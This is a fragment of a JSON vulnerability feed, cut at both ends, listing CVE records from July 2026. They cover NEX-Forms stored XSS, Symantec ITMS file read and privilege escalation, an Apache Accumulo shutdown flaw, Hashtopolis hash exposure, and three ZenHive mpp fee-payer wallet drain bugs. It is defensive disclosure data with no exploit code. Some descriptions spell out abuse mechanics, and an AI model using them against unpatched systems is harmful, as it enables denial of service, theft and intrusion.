D","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:10:25.724663Z","id":"CVE-2019-25764","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"54bf65a7-a193-42d2-b1ba-8e150d3c35e1","type":"Secondary","description":[{"lang":"en","value":"CWE-782"}]}],"references":[{"url":"https://www.asus.com/security-advisory","source":"54bf65a7-a193-42d2-b1ba-8e150d3c35e1"}]}},{"cve":{"id":"CVE-2026-10525","sourceIdentifier":"contact@wpscan.com","published":"2026-07-17T07:16:37.650","lastModified":"2026-07-17T16:17:12.570","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The NEX-Forms  WordPress plugin before 9.2.3 does not sanitise and escape some submitted form data before storing it and outputting it back in the admin dashboard, leading to a Stored Cross-Site Scripting vulnerability which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against high privilege users such as administrators when they view the submitted entries."}],"affected":[{"source":"contact@wpscan.com","affectedData":[{"vendor":"Unknown","product":"NEX-Forms","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"9.2.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:49:43.460174Z","id":"CVE-2026-10525","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://wpscan.com/vulnerability/d1e191e6-ff5b-4cb8-9b12-8ae73cf0d2f0/","source":"contact@wpscan.com"}]}},{"cve":{"id":"CVE-2026-15379","sourceIdentifier":"secure@symantec.com","published":"2026-07-17T08:16:57.773","lastModified":"2026-07-17T18:09:41.767","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"The Altiris WMI provider exposes a class (AltirisAgent_Stream) that allows any local standard user to read the contents of any file accessible to the SYSTEM account, bypassing filesystem ACLs. No admin privileges required. The provider reverts to the LocalSystem context when servicing WMI queries without re-impersonating the caller. Any local standard user can therefore read SYSTEM-readable files — including configuration files, service logs, and secrets stored with SYSTEM/Administrator-only ACLs — by querying the provider directly."}],"affected":[{"source":"secure@symantec.com","affectedData":[{"vendor":"Broadcom","product":"Symantec IT Management Suite","defaultStatus":"unaffected","versions":[{"version":"8.8","status":"affected"},{"version":"8.8.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"secure@symantec.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Red","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"ACTIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"YES","Recovery":"AUTOMATIC","valueDensity":"CONCENTRATED","vulnerabilityResponseEffort":"MODERATE","providerUrgency":"RED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:09:47.422633Z","id":"CVE-2026-15379","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37995","source":"secure@symantec.com"}]}},{"cve":{"id":"CVE-2026-15380","sourceIdentifier":"secure@symantec.com","published":"2026-07-17T08:16:58.913","lastModified":"2026-07-17T18:09:41.767","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A non-administrator interactive user can obtain full SYSTEM code execution through a DCOM/task scheduler logic chain — no network access, no memory corruption required (ITMS 8.7.3)"}],"affected":[{"source":"secure@symantec.com","affectedData":[{"vendor":"Broadcom","product":"Symantec Management Suite","defaultStatus":"unaffected","versions":[{"version":"8.7.3","status":"affected"},{"version":"8.8","status":"affected"},{"version":"8.8.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"secure@symantec.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:C/RE:M/U:Red","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"ACTIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NEGLIGIBLE","Automatable":"YES","Recovery":"AUTOMATIC","valueDensity":"CONCENTRATED","vulnerabilityResponseEffort":"MODERATE","providerUrgency":"RED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:08:32.037888Z","id":"CVE-2026-15380","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37995","source":"secure@symantec.com"}]}},{"cve":{"id":"CVE-2026-62764","sourceIdentifier":"security@apache.org","published":"2026-07-17T09:16:41.853","lastModified":"2026-07-17T18:08:44.860","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Handling of Insufficient Privileges vulnerability in Apache Accumulo.\nAn authenticated, but low-privileged user without system permissions may\nissue a remote command to gracefully shutdown system components\n(compaction-coordinator, compactor, gc, manager, monitor, tserver, or sserver),\nleading to a denial of service.\n\nThis issue affects Apache Accumulo 2.1.4 and 2.1.5.\n\nUsers are recommended to upgrade to version 2.1.6, which fixes the issue."}],"affected":[{"source":"security@apache.org","affectedData":[{"vendor":"Apache Software Foundation","product":"Apache Accumulo","defaultStatus":"unaffected","collectionURL":"https://repo.maven.apache.org/maven2","packageName":"org.apache.accumulo:accumulo-server-base","versions":[{"version":"2.1.4","lessThanOrEqual":"2.1.5","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security@apache.org","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:D/RE:L/U:Green","baseScore":5.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"ACTIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NEGLIGIBLE","Automatable":"YES","Recovery":"USER","valueDensity":"DIFFUSE","vulnerabilityResponseEffort":"LOW","providerUrgency":"GREEN"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:07:29.103234Z","id":"CVE-2026-62764","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-274"}]}],"references":[{"url":"https://accumulo.apache.org/downloads/","source":"security@apache.org"},{"url":"https://accumulo.apache.org/release/accumulo-2.1.6/","source":"security@apache.org"},{"url":"https://github.com/apache/accumulo/issues/6478","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/qclg736k93oqn4qrpw9wxjbb3jhn6gm1","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/07/17/6","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-22104","sourceIdentifier":"csirt@divd.nl","published":"2026-07-17T10:16:36.550","lastModified":"2026-07-17T18:08:27.763","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper access control in Hashtopolis server web-interface chunk activity component for versions prior to 0.14.8 allows any created account to read all cracked hashes of a Hashtopolis server instance."}],"affected":[{"source":"csirt@divd.nl","affectedData":[{"vendor":"hashtopolis","product":"server","defaultStatus":"unaffected","collectionURL":"https://github.com/hashtopolis/server/releases/","versions":[{"version":"0","lessThan":"0.14.8","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"csirt@divd.nl","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:I/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"IRRECOVERABLE","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:03:20.357475Z","id":"CVE-2026-22104","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"csirt@divd.nl","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://csirt.divd.nl/CVE-2026-22104","source":"csirt@divd.nl"},{"url":"https://csirt.divd.nl/DIVD-2026-00010","source":"csirt@divd.nl"},{"url":"https://github.com/hashtopolis/server/releases/tag/v0.14.8","source":"csirt@divd.nl"}]}},{"cve":{"id":"CVE-2026-59252","sourceIdentifier":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","published":"2026-07-17T11:17:13.803","lastModified":"2026-07-17T18:09:55.213","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to drain the fee-payer wallet, resulting in denial of service for legitimate clients.\n\nWhen the mpp Elixir library is configured as fee payer (fee_payer: true), the MPP.Methods.Tempo payment method co-signs and broadcasts a client-supplied EVM transaction without first validating that the client-supplied gas_limit is sufficient to complete the intended call. A malicious client can submit a signed transferWithMemo transaction with gas_limit deliberately set just below the amount required for successful execution. The server co-signs the transaction and broadcasts it via rpc_broadcast_sync. The transaction runs out of gas during EVM execution and reverts, but the fee-payer wallet is still charged for the burned gas while the client pays nothing and receives no resource. Repeated requests from one or more malicious clients drain the fee-payer wallet at near-zero cost to the attacker, ultimately preventing the server from sponsoring gas for legitimate payment requests.\n\nThe wait_for_confirmation = false (optimistic) path is also affected: it invokes simulate_payment_call via eth_call, but that simulation omits the gas parameter and therefore does not catch out-of-gas conditions.\n\nThis issue affects mpp: from 0.2.0 before 0.6.0."}],"affected":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","affectedData":[{"vendor":"ZenHive","product":"mpp","defaultStatus":"unaffected","collectionURL":"https://repo.hex.pm","packageName":"mpp","cpes":["cpe:2.3:a:ZenHive:mpp:*:*:*:*:*:*:*:*"],"modules":["'Elixir.MPP.Methods.Tempo'"],"programFiles":["lib/mpp/methods/tempo.ex"],"programRoutines":[{"name":"'Elixir.MPP.Methods.Tempo':broadcast_and_verify/7"}],"repo":"https://github.com/ZenHive/mpp","packageURL":"pkg:hex/mpp","versions":[{"version":"0.2.0","lessThan":"0.6.0","versionType":"semver","status":"affected"}]},{"vendor":"ZenHive","product":"mpp","defaultStatus":"unaffected","collectionURL":"https://github.com","packageName":"ZenHive/mpp","cpes":["cpe:2.3:a:ZenHive:mpp:*:*:*:*:*:*:*:*"],"modules":["'Elixir.MPP.Methods.Tempo'"],"programFiles":["lib/mpp/methods/tempo.ex"],"programRoutines":[{"name":"'Elixir.MPP.Methods.Tempo':broadcast_and_verify/7"}],"repo":"https://github.com/ZenHive/mpp","packageURL":"pkg:github/ZenHive/mpp","versions":[{"version":"d29d54e507918db00a5b65d90136b73166c017d7","lessThan":"d84e3e528db39654540c2035ea0fbdf7b950d3d1","versionType":"git","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:21:12.801804Z","id":"CVE-2026-59252","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","type":"Secondary","description":[{"lang":"en","value":"CWE-1284"}]}],"references":[{"url":"https://cna.erlef.org/cves/CVE-2026-59252.html","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/commit/d84e3e528db39654540c2035ea0fbdf7b950d3d1","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/security/advisories/GHSA-vj8p-hp9x-gh47","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://osv.dev/vulnerability/EEF-CVE-2026-59252","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/security/advisories/GHSA-vj8p-hp9x-gh47","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-59694","sourceIdentifier":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","published":"2026-07-17T11:17:13.960","lastModified":"2026-07-17T18:09:55.213","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to inflate the fee-payer's gas cost per payment by a large multiplier, degrading the sponsor's operating margin.\n\nWhen the mpp Elixir library is configured as fee payer (fee_payer: true), MPP.Tempo.Transaction.cosign_fee_payer/3 re-signs the client-supplied base fields of the 0x76 AASigned envelope verbatim, including the EIP-2930 access list, without validating its length or contents. EIP-2930 access list entries incur intrinsic gas (~2,400 gas per address, plus 1,900 gas per storage key) charged before any opcode executes, regardless of whether the listed addresses are ever touched. A malicious client submits a valid transferWithMemo call alongside a large number of fabricated access-list entries. The server co-signs and broadcasts the transaction. The intended transfer executes normally, but the fee-payer wallet pays a large multiple of the expected gas cost with no corresponding on-chain work.\n\nAt the maintainer's default of 137 access-list entries (fitting within Bandit's 10,000-byte per-header-field limit) and 100 Gwei max_fee_per_gas, per-payment gas cost rises from ~51,287 to ~380,087 gas, a 7.4x multiplier. Sustained abuse destroys the sponsor's operating margin on low-cost payments and, over time, drains the fee-payer wallet.\n\nThis issue affects mpp: from 0.2.0 before 0.6.0."}],"affected":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","affectedData":[{"vendor":"ZenHive","product":"mpp","defaultStatus":"unaffected","collectionURL":"https://repo.hex.pm","packageName":"mpp","cpes":["cpe:2.3:a:ZenHive:mpp:*:*:*:*:*:*:*:*"],"modules":["'Elixir.MPP.Tempo.Transaction'"],"programFiles":["lib/mpp/tempo/transaction.ex"],"programRoutines":[{"name":"'Elixir.MPP.Tempo.Transaction':cosign_fee_payer/3"}],"repo":"https://github.com/ZenHive/mpp","packageURL":"pkg:hex/mpp","versions":[{"version":"0.2.0","lessThan":"0.6.0","versionType":"semver","status":"affected"}]},{"vendor":"ZenHive","product":"mpp","defaultStatus":"unaffected","collectionURL":"https://github.com","packageName":"ZenHive/mpp","cpes":["cpe:2.3:a:ZenHive:mpp:*:*:*:*:*:*:*:*"],"modules":["'Elixir.MPP.Tempo.Transaction'"],"programFiles":["lib/mpp/tempo/transaction.ex"],"programRoutines":[{"name":"'Elixir.MPP.Tempo.Transaction':cosign_fee_payer/3"}],"repo":"https://github.com/ZenHive/mpp","packageURL":"pkg:github/ZenHive/mpp","versions":[{"version":"d29d54e507918db00a5b65d90136b73166c017d7","lessThan":"5d6338e2334084c5f2a78cfcca474830733ed7e8","versionType":"git","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:22:40.105353Z","id":"CVE-2026-59694","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","type":"Secondary","description":[{"lang":"en","value":"CWE-1284"}]}],"references":[{"url":"https://cna.erlef.org/cves/CVE-2026-59694.html","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/commit/5d6338e2334084c5f2a78cfcca474830733ed7e8","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/security/advisories/GHSA-qpxh-ff8m-c62v","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://osv.dev/vulnerability/EEF-CVE-2026-59694","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/security/advisories/GHSA-qpxh-ff8m-c62v","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-59695","sourceIdentifier":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","published":"2026-07-17T11:17:14.117","lastModified":"2026-07-17T18:09:55.213","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to drain the fee-payer wallet in a single request by naming an arbitrarily high gas price.\n\nWhen the mpp Elixir library is configured as fee payer (fee_payer: true), MPP.Tempo.Transaction.cosign_fee_payer/3 re-signs the client-supplied base fields of the 0x76 AASigned envelope verbatim, including max_fee_per_gas and max_priority_fee_per_gas, without validating that they are within reasonable bounds. A malicious client embeds arbitrarily large values for these fields in the signed envelope. The server co-signs and broadcasts the transaction. The effective_gas_price billed against the fee-payer wallet is derived from the attacker-supplied ceilings, so the server pays those inflated per-gas rates out of its own wallet. A single crafted request can drain the wallet entirely, after which the server can no longer sponsor gas for legitimate payment requests.\n\nThis issue affects mpp: from 0.2.0 before 0.6.0."}],"affected":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","affectedData":[{"vendor":"ZenHive","product":"mpp","defaultStatus":"unaffected","collectionURL":"https://repo.hex.pm","packageName":"mpp","cpes":["cpe:2.3:a:ZenHive:mpp:*:*:*:*:*:*:*:*"],"modules":["'Elixir.MPP.Tempo.Transaction'"],"programFiles":["lib/mpp/tempo/transaction.ex"],"programRoutines":[{"name":"'Elixir.MPP.Tempo.Transaction':cosign_fee_payer/3"}],"repo":"https://github.com/ZenHive/mpp","packageURL":"pkg:hex/mpp","versions":[{"version":"0.2.0","lessThan":"0.6.0","versionType":"semver","status":"affected"}]},{"vendor":"ZenHive","product":"mpp","defaultStatus":"unaffected","collectionURL":"https://github.com","packageName":"ZenHive/mpp","cpes":["cpe:2.3:a:ZenHive:mpp:*:*:*:*:*:*:*:*"],"modules":["'Elixir.MPP.Tempo.Transaction'"],"programFiles":["lib/mpp/tempo/transaction.ex"],"programRoutines":[{"name":"'Elixir.MPP.Tempo.Transaction':cosign_fee_payer/3"}],"repo":"https://github.com/ZenHive/mpp","packageURL":"pkg:github/ZenHive/mpp","versions":[{"version":"d29d54e507918db00a5b65d90136b73166c017d7","lessThan":"5d6338e2334084c5f2a78cfcca474830733ed7e8","versionType":"git","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_D